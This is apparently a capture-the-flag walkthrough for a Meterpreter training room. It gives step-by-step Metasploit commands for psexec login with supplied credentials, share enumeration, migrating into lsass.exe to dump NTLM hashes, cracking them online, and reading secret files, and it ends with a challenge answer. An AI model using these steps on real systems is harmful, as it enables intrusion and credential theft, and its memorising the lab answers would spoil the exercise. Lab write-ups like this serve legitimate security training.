Task 1 Introduction to Meterpreter
Task 2 Meterpreter Flavors
Task 3 Meterpreter Commands
Task 4 Post-Exploitation with Meterpreter
Task 5 Post-Exploitation Challenge
Startup msfconsole, and enter use exploit/windows/smb/pasexec
Set the appropriate options, in this case, RHOSTS (target ip), SMBPass (Password1) and SMBUser (ballen). Finish by entering the run! You should have a meterpreter session now.
What is the computer name?
We can use sysinfo to get this.
What is the target domain?
We can see this from the sysinfo.
What is the name of the share likely created by the user?
First, we need to background our meterpreter shell and than run post/windows/gather/enum_shares and set session 1. Then we can just invoke run and we can see the share name of speedster
What is the NTLM hash of the jchambers user?
First, we need to run ps and look for the PID of lsass.exe which is 764 in my case, next we need to migrate 764, then we can run hashdump
What is the cleartext password of the jchambers user?
We can get online and go to crackstation.net and run the hash through it.
Where is the “secrets.txt” file located?
We just need to run search -f secrets.txt
What is the Twitter password revealed in the “secrets.txt” file?
For this, we need to cat the file but unlike just in Linux the file needs to be in quotes like cat “c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt”
Where is the “realsecret.txt” file located?
For this we just run the search -f realsecret.txt command
What is the real secret?
Now we just need to run cat t “c:\inetpub\wwwroot\realsecret.txt”
R3ap3rd0g 